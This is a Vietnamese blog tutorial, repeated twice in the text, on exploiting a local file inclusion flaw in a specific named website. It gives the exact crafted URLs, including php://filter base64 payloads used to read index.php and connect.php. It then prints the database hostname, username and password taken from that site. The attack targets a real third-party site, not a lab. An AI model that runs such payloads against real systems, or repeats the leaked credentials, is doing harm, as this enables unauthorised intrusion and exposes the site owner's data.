Bài liên quan
khai thác LFI, local file inclusion
- đầu tiên có site http://www.filllpg.co.uk/
- sau đó mình click bừa vào Download Sat Nav Files
- thấy link nó chuyển thành http://www.filllpg.co.uk/index.php?page=download.php
- mình bỏ download.php thay vào đó = dấu '
- kết quả báo lỗi: warning: include(\\\') [function.include]: failed to open stream: No such file or directory in /home/content/60/6457460/html/index.php on line 376
Warning: include() [function.include]: Failed opening '\\\'' for inclusion (include_path='.:/usr/local/php5/lib/php') in /home/content/60/6457460/html/index.php on line 376
-> báo như này là lỗi LFI
- vậy là ngon rồi, có lỗi lFI, thử đọc file index.php của nó rồi tìm đường dẫn đến config.php
- thay đổi link thành http://www.filllpg.co.uk/index.php?page=index.php
- chờ chờ chờ chờ, và what the fuck, chrome has stopped working, cái đệch đùa bố à , vào lại thì thấy load mãi chả ra file nản cmn luôn
- k view đc, dùng công cụ filter của php để view
link: http://www.filllpg.co.uk/index.php?page=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dindex.php
- thu đc 1 đoạn mã base64, decrypt ra đc 1 đoạn code sau:
<?php
include 'connect.php';
include 'functions.php';
$today = date("Y-m-j");
- nhìn thấy có connect.php là nghi chắc là connect database nên view thử file
- tiếp tục thay link ở trên index.php = connect.php
http://www.filllpg.co.uk/index.php?page=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dconnect.php
- lại thu đc đoạn base64 decrypt ra đc code:
<?
$domain = "http://www.filllpg.co.uk/";
$user="filllpg";
$hostname='filllpg.db.6457460.hostedresource.com';
$password="autoG4s";
$database="filllpg";
mysql_connect($hostname,$user,$password);
@mysql_select_db($database) or die( "Unable to select database");
?>
vậy là có user + pass db nhưng rất tiếc là k connect đc mysql =))
p/s: rảnh nên viết tut
Tác giả jeremy Hammond
- đầu tiên có site http://www.filllpg.co.uk/
- sau đó mình click bừa vào Download Sat Nav Files
- thấy link nó chuyển thành http://www.filllpg.co.uk/index.php?page=download.php
- mình bỏ download.php thay vào đó = dấu '
- kết quả báo lỗi: warning: include(\\\') [function.include]: failed to open stream: No such file or directory in /home/content/60/6457460/html/index.php on line 376
Warning: include() [function.include]: Failed opening '\\\'' for inclusion (include_path='.:/usr/local/php5/lib/php') in /home/content/60/6457460/html/index.php on line 376
-> báo như này là lỗi LFI
- vậy là ngon rồi, có lỗi lFI, thử đọc file index.php của nó rồi tìm đường dẫn đến config.php
- thay đổi link thành http://www.filllpg.co.uk/index.php?page=index.php
- chờ chờ chờ chờ, và what the fuck, chrome has stopped working, cái đệch đùa bố à , vào lại thì thấy load mãi chả ra file nản cmn luôn
- k view đc, dùng công cụ filter của php để view
link: http://www.filllpg.co.uk/index.php?page=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dindex.php
- thu đc 1 đoạn mã base64, decrypt ra đc 1 đoạn code sau:
<?php
include 'connect.php';
include 'functions.php';
$today = date("Y-m-j");
- nhìn thấy có connect.php là nghi chắc là connect database nên view thử file
- tiếp tục thay link ở trên index.php = connect.php
http://www.filllpg.co.uk/index.php?page=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dconnect.php
- lại thu đc đoạn base64 decrypt ra đc code:
<?
$domain = "http://www.filllpg.co.uk/";
$user="filllpg";
$hostname='filllpg.db.6457460.hostedresource.com';
$password="autoG4s";
$database="filllpg";
mysql_connect($hostname,$user,$password);
@mysql_select_db($database) or die( "Unable to select database");
?>
vậy là có user + pass db nhưng rất tiếc là k connect đc mysql =))
p/s: rảnh nên viết tut
Tác giả jeremy Hammond
Post a Comment